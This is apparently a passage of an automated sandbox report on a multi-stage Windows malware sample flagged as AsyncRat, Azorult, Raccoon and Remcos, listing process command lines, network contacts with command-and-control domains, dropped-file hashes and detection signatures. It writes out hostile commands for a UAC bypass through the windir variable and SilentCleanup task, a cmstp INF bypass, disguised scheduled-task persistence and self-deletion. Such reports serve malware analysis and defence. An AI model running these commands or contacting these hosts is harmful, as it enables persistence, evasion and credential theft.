cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

"C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe"

C:\Windows\SysWOW64\logagent.exe

C:\Windows\System32\logagent.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\Trast.bat" "

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\nest.bat" "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

"{path}"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3A90.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\udz2b2rb.inf

C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

"{path}"

C:\Windows\system32\taskeng.exe

taskeng.exe {E6E87F1B-80A7-427B-A640-09E5F00EB9D9} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 45.67.231.40:80 45.67.231.40 tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 sergio.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 www.microsoft.com udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 ocsp.verisign.com udp
N/A 23.51.123.27:80 ocsp.verisign.com tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp

Files

memory/684-62-0x0000000075C71000-0x0000000075C73000-memory.dmp

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/2016-65-0x0000000000000000-mapping.dmp

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/2044-72-0x000000000041A684-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/684-74-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2016-76-0x00000000003C0000-0x00000000003C8000-memory.dmp

memory/2016-75-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2044-77-0x0000000000400000-0x0000000000420000-memory.dmp

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/2040-80-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\ProgramData\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\ProgramData\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3eff1d28a83d7c01ebbd6fdbeeb51b9b
SHA1 4f34a875b74b9b002ab25fb2a95a18ce94fbb783
SHA256 668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43
SHA512 1c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 74027813e8cfccc5e9c4dd335fe2eb8c
SHA1 440cc9a282a9fde743ab238329ea703ec4b0e31a
SHA256 9ee3ab8572c1745a3210f6517a5cd01e7e96591efe181d10119cf2c3df818c52
SHA512 8337a406694f547fcbd92118587dd1a57db86eceef9cb88ab4f4eaa15f361a43f57695f19793a27540426ede3bf58f479f5e4bbb1bbb91395390a7328847ce13

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6adf28c5f1ad2f7ee305c5467c2023df
SHA1 d141738df05f1d0678cd3c443810a4b80f8ff114
SHA256 32b94ce0d4addc5b056e30eda5e6861d71f4d60c76af75d963316ce16fe57d74
SHA512 5cdf89f3e884178045bd34fb04cddf3433dfab351473c5aed9a303ec49f7a143d3249e2e048ae459a58485571982cf99a9c6367d1c77d7a58b1620f31eeeb8e0

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

C:\Users\Admin\AppData\Local\Temp\tmp3A90.tmp

MD5 21e61c6e6362bf22646b4c88071f6b5f
SHA1 eef3aef98ce21d17c7cae27f0bce63f098b37f1b
SHA256 18c0e6c54a05a9ef9889201b1cb07a35af8bf6251486ca0b163205f6048cf2d7
SHA512 43bd654ddc31b28de00978a3086594c1e7e93dbfbe3b54763972cfe9eccf30c2ab4bbfd3dd59f77bf8de0765e85bc20a1625d8b49b9d688f845b2b387dd90632

C:\Windows\temp\udz2b2rb.inf

MD5 994f81fd890986436aac86037ed80fa7
SHA1 59945339f09682445ba9a57f86fdc94d13c0a337
SHA256 27141842f4689f5d32e01800ae117d8d93b49ffabe21acbb1fa7c2298c547eb0
SHA512 70a7c61af50ac31e1c6068d278f3697a2be84f09b3384418d6d717ab45ecab4d726564a067856f2528f94c5c1ce2a6634ccd8c0cc76c1dc6fd8ffbf0c4c21096

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RNQMQDEL\Bdojytwvbcgagbvmwkdspythmuhhgvq[1]

MD5 0381b7281382fd974fa960f89f893d92
SHA1 e49a5832692ef9bda4bf8a7e55765b154e37bc12
SHA256 0dc7f9eef6ad651077ea0f77b2963d5fecb0f1cdc8f229a207e3b94c42b33d37
SHA512 41a35220bd15777177fde4031021341fa140cd6f92fb0a549eabcd7286d7d507d4121d6fdebe5db57faa0eef475d56a998e1c529cc0cc0a6f3c59d2a328039c6

Analysis: behavioral2

Detonation Overview

Submitted 2021-08-13 11:33
Reported 2021-08-13 11:36
Platform win10v20210408
Max time kernel 119s
Max time network 159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

Contains code to disable Windows Defender

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Remcos

rat remcos

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18

suricata

Async RAT payload

rat

Downloads MZ/PE file

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
